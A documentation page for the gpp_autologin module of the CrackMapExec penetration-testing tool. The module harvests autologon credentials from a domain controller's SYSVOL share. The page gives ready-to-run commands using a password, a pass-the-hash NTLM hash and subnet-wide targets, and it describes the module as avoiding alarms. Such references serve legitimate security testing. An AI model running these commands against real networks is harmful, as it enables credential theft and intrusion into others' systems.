CrackMapExec Gpp_autologin (smb)
This page contains detailed information about how to use the gpp_autologin CME module while using the smb protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This module mounts the SYSVOL volume of the Active Directory domain controller(s) and looks for the Registry.xml file in order to find autologon information. If found, it returns the username and password (DefaultUserName, DefaultPassword and DefaultDomainName).
The gpp_autologin module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.
Supported Protocols
- smb
Module Source Code
Authors
Module Usage
This is how to use the gpp_autologin module while using the smb protocol:
Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M gpp_autologin
Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M gpp_autologin
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M gpp_autologin
Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M gpp_autologin
CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:
# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M gpp_autologin
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M gpp_autologin
# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M gpp_autologin
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M gpp_autologin
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M gpp_autologin
Module Options
As you can see below, the gpp_autologin module doesn't have any additional options:
# cme smb -M gpp_autologin --options
[*] gpp_autologin module options:
References
Version
This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.